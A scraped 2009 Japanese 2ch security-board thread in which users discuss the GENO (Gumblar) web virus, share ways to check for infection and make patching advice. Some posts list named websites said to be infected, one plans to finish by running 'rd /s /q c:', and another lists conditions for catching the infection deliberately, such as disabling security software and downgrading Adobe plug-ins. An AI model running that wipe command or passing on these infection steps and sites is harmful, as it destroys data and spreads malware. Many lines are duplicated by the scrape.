sqlsodbc.chmの他にHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の様子はどうですか?
ありがとう。やっぱりもう重いだとかcmdが開かないとかそんな確認方法は無駄かも「しれない」のね。
sqlsodbc.chmの他にHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32
の様子はどうですか?
453 :192.168.0.774:2009/05/17(日) 23:45:12 ID:NJZAyhdU0
つか無料鯖で捨て垢作ってftpで適当なhtmlファイル上げてみてソース確認すれば感染確認できるやないかえ
454 :192.168.0.774:2009/05/17(日) 23:56:05 ID:kVP/8H1t0
ジェノチェッカーで、俺のPC(VISTA)のsqlsodbc.chmのサイズが46,133で感染の疑いが有るっていうんで、
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
を実行したら最終更新日が2006年11月……
これは、どれを信じりゃいいのかわからなくなってきたんだが。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
を実行したら最終更新日が2006年11月……
これは、どれを信じりゃいいのかわからなくなってきたんだが。
455 :192.168.0.774:2009/05/17(日) 23:59:16 ID:jG2pcMw10
とりあえずAdobeのFlashとReaderを最新にするなりアンインストールしとけば平気ですか?
457 :192.168.0.774:2009/05/18(月) 00:02:47 ID:kVP/8H1t0
>>446
vistaでジェノチェッカーを使用し、ファイルサイズが違うので感染の疑いが濃厚です。
と、出たのだが401さんの言うようにヘルプファイルで開けるし、最終更新日は遙か前だわ。
こうなるとジェノチェッカーで感染したと思いこんじゃう人が出てくるんじゃないだろうか…
vistaでジェノチェッカーを使用し、ファイルサイズが違うので感染の疑いが濃厚です。
と、出たのだが401さんの言うようにヘルプファイルで開けるし、最終更新日は遙か前だわ。
こうなるとジェノチェッカーで感染したと思いこんじゃう人が出てくるんじゃないだろうか…
458 :192.168.0.774:2009/05/18(月) 00:02:52 ID:xqkDEgVB0
このGENOって何の為のウィルスかは未だ良く分かってないんですよね?
オマケに感染したのかを2chとかで知って確認した人ぐらいしか自覚が無いらしいし…
新型インフルでは無いけどこれから爆発的に被害出そうで気味悪いなぁ
オマケに感染したのかを2chとかで知って確認した人ぐらいしか自覚が無いらしいし…
新型インフルでは無いけどこれから爆発的に被害出そうで気味悪いなぁ
>>452
そこは今まで通り、auxとして登録されるのを確認してあります。>424の2番の所ですね。
詳しい人なら、そこを押さえるのが一番でしょう。 レジストリを確認しにくければ、やはりsqlsodbc.chmのサイズと中身かな。
cmd.exeとレジストリエディタは、あちらが改良したからには、今後のバージョンも使えないと思った方が良いかと。
そこは今まで通り、auxとして登録されるのを確認してあります。>424の2番の所ですね。
詳しい人なら、そこを押さえるのが一番でしょう。 レジストリを確認しにくければ、やはりsqlsodbc.chmのサイズと中身かな。
cmd.exeとレジストリエディタは、あちらが改良したからには、今後のバージョンも使えないと思った方が良いかと。
460 :192.168.0.774:2009/05/18(月) 00:04:48 ID:vIxScWxq0
あーなんか勝手にドライバ作ってんのね
461 :192.168.0.774:2009/05/18(月) 00:06:03 ID:FSY0bnP50
なんか、ウイルス作者がこのスレ見て次verの対策練ってたらやだなぁ
462 :192.168.0.774:2009/05/18(月) 00:08:40 ID:j6rZXl7R0
463 :192.168.0.774:2009/05/18(月) 00:08:43 ID:uebw+uxF0
とりあえず、初心者にわかりやすい説明としてはsqlsodbc.chmをダブクリで開いてみて、
エラーが出ないでヘルプファイルが開けたらセーフとかにしたほうが混乱が少なくていいんじゃマイカ?
エラーが出ないでヘルプファイルが開けたらセーフとかにしたほうが混乱が少なくていいんじゃマイカ?
464 :192.168.0.774:2009/05/18(月) 00:09:39 ID:RYc+mlfs0
sqlsodbc.chmのショートカットデスクトップに置いとくか
465 :192.168.0.774:2009/05/18(月) 00:12:57 ID:H93VbD2h0
466 :192.168.0.774:2009/05/18(月) 00:16:49 ID:r6TpwBf70
>>461
こわいこというなよ
こわいこというなよ
467 :192.168.0.774:2009/05/18(月) 00:23:11 ID:kK4DaAw60
>>352
自分もはまりました。
RPC と 「有効なデバイスが関連づけられていない」で検索
http://ziddy.japan.zdnet.com/qa3068747.html
こちらに書かれていた情報で直りました。
自分もはまりました。
RPC と 「有効なデバイスが関連づけられていない」で検索
http://ziddy.japan.zdnet.com/qa3068747.html
こちらに書かれていた情報で直りました。
468 :192.168.0.774:2009/05/18(月) 00:26:33 ID:SGBG03gk0
>>456
ごめん><
ごめん><
469 :192.168.0.774:2009/05/18(月) 00:29:04 ID:uebw+uxF0
これって世界規模ではどんな感じで広がってるんだろうか。
あと質問なんだけれど、sqlsodbc.chmって開くと日本語でヘルプファイルが出てくる?
だったら、ジェノチェッカーでサイズの違いで感染に引っかかったというコメントが出る原因がわかるんだが。
もしそうなら俺がドイツ語版vistaを使っているからということで説明がつく。
あと質問なんだけれど、sqlsodbc.chmって開くと日本語でヘルプファイルが出てくる?
だったら、ジェノチェッカーでサイズの違いで感染に引っかかったというコメントが出る原因がわかるんだが。
もしそうなら俺がドイツ語版vistaを使っているからということで説明がつく。
470 :192.168.0.774:2009/05/18(月) 00:31:26 ID:yv43KHe00
471 :192.168.0.774:2009/05/18(月) 00:31:28 ID:+m52NSIq0
今Microsoft Updateをしようとしたら、エラー番号: 0x80072EFDが出て
できませんでした。OSはXP SP3です。
できませんでした。OSはXP SP3です。
472 :192.168.0.774:2009/05/18(月) 00:32:17 ID:TQZo9UtD0
473 :192.168.0.774:2009/05/18(月) 00:35:35 ID:/YAiDTNe0
いつも思うんだけどさ。
こういう2ちゃんみたいな低俗な掲示板で、頑張ってウイルスと
戦うお前らって、
勇者だよね。
・・・ただのヒマ人?またまた御冗談を。
こういう2ちゃんみたいな低俗な掲示板で、頑張ってウイルスと
戦うお前らって、
勇者だよね。
・・・ただのヒマ人?またまた御冗談を。
474 :192.168.0.774:2009/05/18(月) 00:35:42 ID:uebw+uxF0
475 :192.168.0.774:2009/05/18(月) 00:36:49 ID:Jag7vYy/0
今すっごいネット重いんだけどウイルスと関係ある?
476 :192.168.0.774:2009/05/18(月) 00:37:32 ID:0Y431MZ/0
>>472
俺が知ってるのは
>3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
>感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
ttp://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
今現在どう進行してるのかね
俺が知ってるのは
>3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
>感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
ttp://www3.atword.jp/gnome/2009/04/08/unexpected-latvia-tour-its-still-free/
今現在どう進行してるのかね
477 :192.168.0.774:2009/05/18(月) 00:42:50 ID:uebw+uxF0
>>475
つテレホタイム
>>472
あぁ、ドイツの掲示板でも感染の装弾している所を発見。
やっぱり感染の確認方法はほとんど一緒。
やはり感染疑いのユーザーが雪崩れ込んでて、FUCK!の嵐でまともに相談できていない模様。
どこも一緒なんだなw
つテレホタイム
>>472
あぁ、ドイツの掲示板でも感染の装弾している所を発見。
やっぱり感染の確認方法はほとんど一緒。
やはり感染疑いのユーザーが雪崩れ込んでて、FUCK!の嵐でまともに相談できていない模様。
どこも一緒なんだなw
478 :192.168.0.774:2009/05/18(月) 00:47:02 ID:QCHe1qHC0
479 :192.168.0.774:2009/05/18(月) 00:47:30 ID:EMdE+yZc0
480 :192.168.0.774:2009/05/18(月) 00:49:25 ID:vNF2317C0
さっきカスペルのチェックでマルウェア検出された俺涙目
今ウィルスバスターでもっかい確認中、ダメならもうだめだ
今ウィルスバスターでもっかい確認中、ダメならもうだめだ
481 :192.168.0.774:2009/05/18(月) 00:51:52 ID:uebw+uxF0
482 :192.168.0.774:2009/05/18(月) 00:52:58 ID:QCHe1qHC0
>>481
承知した。ありがとう。
承知した。ありがとう。
483 :192.168.0.774:2009/05/18(月) 00:57:45 ID:D1poB8XB0
作者ってマジで外人なのか
何のために・・・
何のために・・・
484 :192.168.0.774:2009/05/18(月) 00:58:15 ID:+m52NSIq0
アップデートできなかったらってのは、エラー番号: 0x80072EFDがでたらと言うことですか?
それとも、Microsoft Updateのトップサイトにすらつながらない状態ですか?
それとも、Microsoft Updateのトップサイトにすらつながらない状態ですか?
485 :192.168.0.774:2009/05/18(月) 00:58:23 ID:0Y431MZ/0
巨大なbotnetの作成
486 :192.168.0.774:2009/05/18(月) 00:58:25 ID:j6rZXl7R0
金稼ぎじゃないかと言われてる
487 :192.168.0.774:2009/05/18(月) 01:00:58 ID:vNL6vAf4O
さっきからインターネットが繋がんないんだが…
感染したのかな?
感染したのかな?
488 :192.168.0.774:2009/05/18(月) 01:10:07 ID:2IEunuB80
489 :192.168.0.774:2009/05/18(月) 01:15:12 ID:TTbAOLbH0
何よりこわいと思ったのが、製薬会社やらの普通の企業もやられてるのに、未だほとんどニュースとして公表されてないこと
2ch張り付いてる奴ならともかく、もう少し広まったら確実に普通にネットやってる連中のPC終わるぞ
2ch張り付いてる奴ならともかく、もう少し広まったら確実に普通にネットやってる連中のPC終わるぞ
490 :192.168.0.774:2009/05/18(月) 01:16:58 ID:EgqX730p0
>>489
イメージダウンになるから黙ってるんでしょ
イメージダウンになるから黙ってるんでしょ
491 :192.168.0.774:2009/05/18(月) 01:18:53 ID:p9Xcqg7P0
黙ってる方が後で大幅イメージダウンになるこのご時世
492 :192.168.0.774:2009/05/18(月) 01:23:34 ID:RCHjlpg60
493 :192.168.0.774:2009/05/18(月) 01:29:06 ID:j6rZXl7R0
アンチウイルスベンダーの対応も今一だからね…
積極的にプレスリリース出してる所も英語圏が中心でしょう
それが原因じゃないかなあ
積極的にプレスリリース出してる所も英語圏が中心でしょう
それが原因じゃないかなあ
494 :192.168.0.774:2009/05/18(月) 01:33:23 ID:TTbAOLbH0
個人的に一番嫌なのはカスペから乗り換えようとしてたノートン先生の今回の対応が残念すぎたこと
これでまたセキュリティを考え直さなきゃいけない
これでまたセキュリティを考え直さなきゃいけない
495 :192.168.0.774:2009/05/18(月) 01:40:51 ID:Y6ubUO900
感染の確認方法だけど、gnomeの人は初めから
sqlsodbc.chmとレジストリ値の確認だけで
cmd.exeやregeditの起動による確認方法は書いてないね
やっぱりこの人のところが一番信用できるなと思った
ニフティの件みたいに良く読まない人がデマ流したりして大変みたいだけど
これからもがんばってほしい
sqlsodbc.chmとレジストリ値の確認だけで
cmd.exeやregeditの起動による確認方法は書いてないね
やっぱりこの人のところが一番信用できるなと思った
ニフティの件みたいに良く読まない人がデマ流したりして大変みたいだけど
これからもがんばってほしい
496 :192.168.0.774:2009/05/18(月) 01:44:09 ID:BzNhsWFE0
225のヤツとか逮捕の対象にならんの?
ウイルス広めるヤツは逮捕&死刑でいいでしょ。
ウイルス広めるヤツは逮捕&死刑でいいでしょ。
497 :192.168.0.774:2009/05/18(月) 01:46:45 ID:AxgR+t010
>>496
225踏んで感染したんですか?
225踏んで感染したんですか?
498 :192.168.0.774:2009/05/18(月) 01:51:13 ID:BzNhsWFE0
いんや。流石にリンクを踏むのが怖くてね。
後に感染したってあったから、もう少し注意が足りなかったら感染してたかも・・・
って考えるとな・・・。
後に感染したってあったから、もう少し注意が足りなかったら感染してたかも・・・
って考えるとな・・・。
499 :192.168.0.774:2009/05/18(月) 02:18:04 ID:zXvWG0pfO
500 :192.168.0.774:2009/05/18(月) 02:19:28 ID:SGBG03gk0
>>499
そんなちっぽけなレベルの話じゃないです
そんなちっぽけなレベルの話じゃないです
501 :192.168.0.774:2009/05/18(月) 02:19:44 ID:zXvWG0pfO
502 :192.168.0.774:2009/05/18(月) 02:28:00 ID:tHeAy9ld0
どうせ後で「GENOウイルス?あぁあんなんに騙されて大騒ぎしてた奴らなんてただの馬鹿だよww」ってことになんだろ?
503 :192.168.0.774:2009/05/18(月) 02:28:52 ID:z2bzI9GC0
/^7_
. ,' / /
| //ヘ
| / /
三 | / , ヘ
-‐¬ { ミ / /
\ / 三 L 」 ミ / _ ニコ // ヽ,
. X / | | ミ / >'´ ,.└''"´ ̄ ̄ `ヽ、 キャッシュ消せばいいんだよ
. / / 、 | | / ヽ ,. '´ 、、 ヽ ヽ
. ,′ , \ | |__ ノ , lヽ j /、lヽ ト、_,,.',
{ /´ ̄`'J r'´ r'"イ .ノ\| .レ r=;ァ'レ' { }
― -- { }. { !、 l rr=- / `'''l.>‐ .、
‐ ― ヽ. _人. レヽ.,ト' ー=‐' / l 、,,_,,ノ
/ /ヽl } \. ,}' ', /ヘ, /レ' ,/ >‐、
ヽ / /ミ ノ ノ、 ` 7'´レ1 ヽ 人ル'レ' 'i、_
/ / ミ (_/ \ レ〜i` ヽ 、_ ( "
. ,' / /
| //ヘ
| / /
三 | / , ヘ
-‐¬ { ミ / /
\ / 三 L 」 ミ / _ ニコ // ヽ,
. X / | | ミ / >'´ ,.└''"´ ̄ ̄ `ヽ、 キャッシュ消せばいいんだよ
. / / 、 | | / ヽ ,. '´ 、、 ヽ ヽ
. ,′ , \ | |__ ノ , lヽ j /、lヽ ト、_,,.',
{ /´ ̄`'J r'´ r'"イ .ノ\| .レ r=;ァ'レ' { }
― -- { }. { !、 l rr=- / `'''l.>‐ .、
‐ ― ヽ. _人. レヽ.,ト' ー=‐' / l 、,,_,,ノ
/ /ヽl } \. ,}' ', /ヘ, /レ' ,/ >‐、
ヽ / /ミ ノ ノ、 ` 7'´レ1 ヽ 人ル'レ' 'i、_
/ / ミ (_/ \ レ〜i` ヽ 、_ ( "
504 :192.168.0.774:2009/05/18(月) 02:29:04 ID:4oFiJRbxO
ieから火狐に変えれば予防出来る?
てか、初心者向けのまとめサイトってないかな?
てか、初心者向けのまとめサイトってないかな?
505 :192.168.0.774:2009/05/18(月) 02:30:38 ID:z2bzI9GC0
>>504
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
ここまでは出来るだろ。
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
ここまでは出来るだろ。
506 :192.168.0.774:2009/05/18(月) 02:30:55 ID:O4S1nyz60
少なくとも4月頃は色んな板でやたらとスレ立って祭りしてたようなイメージがあるが
逆に今回の騒ぎ様の方が違和感というか今更感があるんじゃ?
逆に今回の騒ぎ様の方が違和感というか今更感があるんじゃ?
507 :192.168.0.774:2009/05/18(月) 02:34:46 ID:g3jcf+6w0
情弱腐女子とニコ厨大好き東方・ボーカロイド同人サイトで
急速にパンデミック起こしたからじゃね
急速にパンデミック起こしたからじゃね
508 :192.168.0.774:2009/05/18(月) 02:35:24 ID:0qo6gqNs0
実際に感染してんのはそいつらだけだろうな
509 :192.168.0.774:2009/05/18(月) 02:36:14 ID:tHeAy9ld0
707 名前:GENO[sage] 投稿日:2009/05/18(月) 02:31:35 ID:93Cm5lq90
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われる
709 名前:GENO[sage] 投稿日:2009/05/18(月) 02:33:00 ID:9UIQFr160
>>707
なるへそ、だから同人で感染爆発してるのか
Photoshopとか割れ物使ってる人多いから
Adobe製品を丸ごとアップデートOFFにしてる人多そうだよね
そしてPDF ReaderやFlashまでアップデートされずにウイルスに狙われる
709 名前:GENO[sage] 投稿日:2009/05/18(月) 02:33:00 ID:9UIQFr160
>>707
なるへそ、だから同人で感染爆発してるのか
510 :192.168.0.774:2009/05/18(月) 02:36:32 ID:9OAY1try0
まぁ四月の時はGENOのサイト行ってない奴は他人事で済まされたからな
いや、実際済まなかったんだけどさ
いや、実際済まなかったんだけどさ
511 :192.168.0.774:2009/05/18(月) 02:36:54 ID:PGXf1oVHO
夏コミが近いというのに
まったくもう!
まったくもう!
512 :192.168.0.774:2009/05/18(月) 02:37:32 ID:ovjuZukc0
とりあえず、今日会社とか学校ある人は行き先のPCを要チェックかと。
セキュリティ部門の人とかが今回の件わかっていると被害を抑えることができるんだけど…
ベンダーが日本時間の月曜朝に対応するなんてありえないと思うし…
※まずはネットワークから切り離してhostsを変更してから再起動後に…
諸々のファイルチェックして…って大変だなぁ…
セキュリティ部門の人とかが今回の件わかっていると被害を抑えることができるんだけど…
ベンダーが日本時間の月曜朝に対応するなんてありえないと思うし…
※まずはネットワークから切り離してhostsを変更してから再起動後に…
諸々のファイルチェックして…って大変だなぁ…
513 :192.168.0.774:2009/05/18(月) 02:37:59 ID:yKeLT0rF0
>>506
同人板の方で盛り上がって火がついて燃え移ったというか巻き込まれたというか
サイト持ちの人が多いのもあるけど、もともと燃えやすい極端な人が多い
きちんと理解していて宥めてる人に対して
危機意識が足りないと噛み付いてる状態で、セキュ板も随分荒れた
(同人板が荒したってわけじゃなくて同人板から流れてきた人が原因でスレ住人が荒れた)
同人板の方で盛り上がって火がついて燃え移ったというか巻き込まれたというか
サイト持ちの人が多いのもあるけど、もともと燃えやすい極端な人が多い
きちんと理解していて宥めてる人に対して
危機意識が足りないと噛み付いてる状態で、セキュ板も随分荒れた
(同人板が荒したってわけじゃなくて同人板から流れてきた人が原因でスレ住人が荒れた)
514 :192.168.0.774:2009/05/18(月) 02:40:05 ID:uebw+uxF0
いや、意外と潜伏期間ってこんなもんなんじゃないのかな。
>>504
こっちの方が優しく教えてくれると思うぞ
【管理も】同人サイト・GENOウィルス注意7【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242565127/l50
>>504
こっちの方が優しく教えてくれると思うぞ
【管理も】同人サイト・GENOウィルス注意7【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242565127/l50
515 :192.168.0.774:2009/05/18(月) 02:41:31 ID:6Sa4e4kP0
誰かウイルスに確実に感染するサイト教えてください
とりあえず今のところ
成美堂出版 www.seibidoshuppan.co.jp/
livmail www.livmail.com/3others-page/janet/tokusen/index.htm
carwash www.carwash.co.jp/
senlights www.senlights.co.jp/seihin/kirenaru-1s.htm
を試してみました
誰かお願いします
とりあえず今のところ
成美堂出版 www.seibidoshuppan.co.jp/
livmail www.livmail.com/3others-page/janet/tokusen/index.htm
carwash www.carwash.co.jp/
senlights www.senlights.co.jp/seihin/kirenaru-1s.htm
を試してみました
誰かお願いします
516 :192.168.0.774:2009/05/18(月) 02:44:44 ID:yKeLT0rF0
517 :192.168.0.774:2009/05/18(月) 02:45:21 ID:ovjuZukc0
こういうときは自宅警備員さんがうらやましい…かな?
うちの勤め先…絶対誰かGENO罠踏んでるだろうなぁ
本社の基幹でDenyしてくれてると安心なんだけど…
感染者には始末書というプレゼントが…(=ω=
うちの勤め先…絶対誰かGENO罠踏んでるだろうなぁ
本社の基幹でDenyしてくれてると安心なんだけど…
感染者には始末書というプレゼントが…(=ω=
518 :192.168.0.774:2009/05/18(月) 02:48:05 ID:O4S1nyz60
519 :192.168.0.774:2009/05/18(月) 02:51:10 ID:yKeLT0rF0
>>518
更に砕くと
同人ノウハウの一つのスレで1回話題になってちょっと騒ぎになる
これは騒いで皆に知らせた方が良いということで同人板にスレが立つ
超盛り上がる。と言う感じ。たった一夜で連投規制のある板で凄い加速だよ
前々からこの手のタイプのウイルスはこんなもんでしょ
今回はけっこう広まってるからちょっと事情が違うけど
更に砕くと
同人ノウハウの一つのスレで1回話題になってちょっと騒ぎになる
これは騒いで皆に知らせた方が良いということで同人板にスレが立つ
超盛り上がる。と言う感じ。たった一夜で連投規制のある板で凄い加速だよ
前々からこの手のタイプのウイルスはこんなもんでしょ
今回はけっこう広まってるからちょっと事情が違うけど
520 :192.168.0.774:2009/05/18(月) 02:51:22 ID:ua7Ctj4Z0
eSafeでも紹介記事が出てたようだ。5/14。
ttp://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html
ttp://www.aladdin.co.jp/esafe/virus/v_all/AircBlog_post_2009_05_How-a-popular-nightlife-website-ruined-its-visitor's-weekend.html
521 :192.168.0.774:2009/05/18(月) 02:52:28 ID:d0ClE+9g0
522 :192.168.0.774:2009/05/18(月) 02:56:34 ID:ImVScTUk0
523 :192.168.0.774:2009/05/18(月) 02:57:45 ID:o7Ns7JFwP
>>521
それはないとは言い切れないよ
それはないとは言い切れないよ
524 :192.168.0.774:2009/05/18(月) 02:59:22 ID:uebw+uxF0
525 :192.168.0.774:2009/05/18(月) 03:00:28 ID:PGXf1oVHO
ケータイからPCブラウザ見るぶんには大丈夫なんでしょ?
526 :192.168.0.774:2009/05/18(月) 03:00:50 ID:3Vb3xWiS0
このウィルスなんて読むの?じぇの?げの?
527 :192.168.0.774:2009/05/18(月) 03:01:08 ID:/yFIekht0
★危険★
これも感染?
www.seibidoshuppan.co.jp
これも感染?
www.seibidoshuppan.co.jp
528 :192.168.0.774:2009/05/18(月) 03:02:06 ID:o7Ns7JFwP
>>527
してるね
してるね
529 :192.168.0.774:2009/05/18(月) 03:02:24 ID:g3jcf+6w0
同人板って他のν速やvipやここのウイルス対策スレと
明らかに毛色というかノリというか湿度が違う気がする
なんかこわい
明らかに毛色というかノリというか湿度が違う気がする
なんかこわい
530 :192.168.0.774:2009/05/18(月) 03:04:32 ID:wbZLj6zq0
531 :192.168.0.774:2009/05/18(月) 03:04:48 ID:7HSqf6Si0
532 :192.168.0.774:2009/05/18(月) 03:05:50 ID:6Sa4e4kP0
>>516
>>515に追記します
>>515のサイトを踏んだ結果
成美堂出版はなんともなく
他3つのサイトではトロイが検出されました
けど感染したいウイルスはGENOです
現在の環境は
Windows XP Home SP3
IE6
reader 8
flash player 9
JS有効
セキュリティー無効
ファイアーウォール無効
です。
他にGENOに感染するための条件はなにかありますか?
>>515に追記します
>>515のサイトを踏んだ結果
成美堂出版はなんともなく
他3つのサイトではトロイが検出されました
けど感染したいウイルスはGENOです
現在の環境は
Windows XP Home SP3
IE6
reader 8
flash player 9
JS有効
セキュリティー無効
ファイアーウォール無効
です。
他にGENOに感染するための条件はなにかありますか?
533 :192.168.0.774:2009/05/18(月) 03:07:29 ID:PGXf1oVHO
何故感染したがる
534 :192.168.0.774:2009/05/18(月) 03:08:21 ID:eVa+R5Lo0
535 :192.168.0.774:2009/05/18(月) 03:09:04 ID:6Sa4e4kP0
>>533
○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが勝手に動いてないか確認
・Acrobat(Adobe Reader?)が勝手に起動
・CPU使用率をチェック
・PDFファイルやシステムファイルが増殖してるかチェック
・cmdでdir C:\WINDOWS\system32\sqlsodbc.chmのサイズが50,727か確認
・最後cmdからrd /s /q c:を実行
○検証するブラウザ
IE6
IE7
IE8
Firefox 3.0.10
Opera 9.64
Chome 1.0.154.65
を自分で検証してみたい
○感染後の行動
・cmd.exeとregedit.exeが起動するか確認
・タスクマネージャーでcmdが勝手に動いてないか確認
・Acrobat(Adobe Reader?)が勝手に起動
・CPU使用率をチェック
・PDFファイルやシステムファイルが増殖してるかチェック
・cmdでdir C:\WINDOWS\system32\sqlsodbc.chmのサイズが50,727か確認
・最後cmdからrd /s /q c:を実行
○検証するブラウザ
IE6
IE7
IE8
Firefox 3.0.10
Opera 9.64
Chome 1.0.154.65
を自分で検証してみたい
536 :192.168.0.774:2009/05/18(月) 03:09:23 ID:ZooZ8biq0
>>531
同人女は他人から見たら馬鹿としか思えないローカルルールが多く、それらを守らないとヲチというリンチに遭う
危機感煽ってるくせに感染サイト晒せないのはそのせいだね
大いなる矛盾なんだが
あそこ見てると葬式の時だけはりきってる普段は地味なおばさんを思い出す
同人女は他人から見たら馬鹿としか思えないローカルルールが多く、それらを守らないとヲチというリンチに遭う
危機感煽ってるくせに感染サイト晒せないのはそのせいだね
大いなる矛盾なんだが
あそこ見てると葬式の時だけはりきってる普段は地味なおばさんを思い出す
537 :192.168.0.774:2009/05/18(月) 03:11:10 ID:gtQ58YdFO
ラトビアでも流行ってると聞いたぞ
538 :192.168.0.774:2009/05/18(月) 03:12:31 ID:yKeLT0rF0
539 :192.168.0.774:2009/05/18(月) 03:13:01 ID:PGXf1oVHO
540 :192.168.0.774:2009/05/18(月) 03:15:15 ID:7HSqf6Si0
クリーンインストールすりゃ良いって分かってんだから、
予備のPC使って自分で確かめたいって奴もいるだろう。
予備のPC使って自分で確かめたいって奴もいるだろう。
541 :192.168.0.774:2009/05/18(月) 03:16:23 ID:uebw+uxF0
>>535
まさか感染したまま、満員電車に乗るような感じのことをするんじゃないだろうな。
まさか感染したまま、満員電車に乗るような感じのことをするんじゃないだろうな。
542 :192.168.0.774:2009/05/18(月) 03:16:43 ID:vNF2317C0
543 :192.168.0.774:2009/05/18(月) 03:18:25 ID:6Sa4e4kP0
>>538
他のスレでもそう聞いたよ
>>539
単なるブログのネタだよ
かれこれ6時間以上GENOウイルスを求めてさまよってる・・・
俺はただSSと検証レポをしたいだけなのに(´;ω;`)
まさかこんなに時間がかかるとは思わなんだぞ
他のスレでもそう聞いたよ
>>539
単なるブログのネタだよ
かれこれ6時間以上GENOウイルスを求めてさまよってる・・・
俺はただSSと検証レポをしたいだけなのに(´;ω;`)
まさかこんなに時間がかかるとは思わなんだぞ
544 :192.168.0.774:2009/05/18(月) 03:18:33 ID:yKeLT0rF0
545 :192.168.0.774:2009/05/18(月) 03:19:11 ID:XWeKEH7q0
>>535
・XP以下のWindowsでアクセスする。
・Adobe Readerをインストールしている。
・Flash Playerをインストールしている。
・JavaScriptを有効にする。
・Chrome以外のブラウザでアクセスする。
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・過去に攻撃サイトにアクセスしたことがあり、その際cookieが有効だった場合はcookieを削除する。以後cookieを拒否する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
・セキュリティソフトを使用しない。
以上の条件を満たすことが必要。
これでも感染しないようであれば
・Adobe Reader、Flash Playerのバージョンを下げてみる
・仮想マシンを使っているならば、実機で試してみる
・NX bitが実装されているCPUを使用しているならば、実装されていないCPUを使用する
・XP以下のWindowsでアクセスする。
・Adobe Readerをインストールしている。
・Flash Playerをインストールしている。
・JavaScriptを有効にする。
・Chrome以外のブラウザでアクセスする。
・ロケーションバーにURLを打ち込んでアクセスするのではなく、感染サイトからアクセスする。またはリファラを偽装する
・過去に攻撃サイトにアクセスしたことがあり、その際cookieが有効だった場合はcookieを削除する。以後cookieを拒否する
・もし以前に攻撃サイトにアクセスしたことがあり、その際「XP以下のWindows以外」でアクセスしていた場合はIPアドレスを変える
・セキュリティソフトを使用しない。
以上の条件を満たすことが必要。
これでも感染しないようであれば
・Adobe Reader、Flash Playerのバージョンを下げてみる
・仮想マシンを使っているならば、実機で試してみる
・NX bitが実装されているCPUを使用しているならば、実装されていないCPUを使用する
546 :192.168.0.774:2009/05/18(月) 03:20:17 ID:gtQ58YdFO
547 :192.168.0.774:2009/05/18(月) 03:21:12 ID:w3XVYZKL0
>>521
可能だろ、何言ってるんだ
可能だろ、何言ってるんだ
548 :192.168.0.774:2009/05/18(月) 03:21:23 ID:PGXf1oVHO
549 :192.168.0.774:2009/05/18(月) 03:21:45 ID:wsKEiiw60
550 :192.168.0.774:2009/05/18(月) 03:22:05 ID:yKeLT0rF0
551 :192.168.0.774:2009/05/18(月) 03:23:16 ID:gtQ58YdFO
そういえば俺のパソコン感染して初期化した
GENOウイルスらしきものは見つからなかったがネットワークに接続できない
まさか今もパソコン内部に潜んでて進化してるなんてことないよな
GENOウイルスらしきものは見つからなかったがネットワークに接続できない
まさか今もパソコン内部に潜んでて進化してるなんてことないよな
552 :192.168.0.774:2009/05/18(月) 03:24:28 ID:SGBG03gk0
553 :192.168.0.774:2009/05/18(月) 03:25:38 ID:yKeLT0rF0
>>549
感染したら最後はそれでフィニッシュしないとw
アンチソフトでの駆除できないんだし。不思議なことはないよ
>>543
リボンマジックでググってみてくれ
このサイトもまだ対応してないっぽい。ソースが黒い
感染したら最後はそれでフィニッシュしないとw
アンチソフトでの駆除できないんだし。不思議なことはないよ
>>543
リボンマジックでググってみてくれ
このサイトもまだ対応してないっぽい。ソースが黒い
554 :192.168.0.774:2009/05/18(月) 03:25:56 ID:Z5hmtXFr0
774 名前:geno[sage] 投稿日:2009/05/18(月) 03:24:56 ID:E9Mwu5RAP
296 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 03:20:10
なんか同人スレは「質問はセキュリティ板へ行け」みたいに言ってるぞw
なんでセキュ板がそこまで面倒みてやらなならんのだと・・・
しかも親切に質問に答えてやってると「セキュリティ板に乗っ取られてる!!」とかw
もうねアフォか馬鹿か同人かと・・・
296 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 03:20:10
なんか同人スレは「質問はセキュリティ板へ行け」みたいに言ってるぞw
なんでセキュ板がそこまで面倒みてやらなならんのだと・・・
しかも親切に質問に答えてやってると「セキュリティ板に乗っ取られてる!!」とかw
もうねアフォか馬鹿か同人かと・・・
555 :192.168.0.774:2009/05/18(月) 03:26:01 ID:PGXf1oVHO
>>543
レポートかw
確かにブログネタにしたら訪問者増えるよね、きっと
怖くて今ケータイからやってるんで力になってあげられないけど
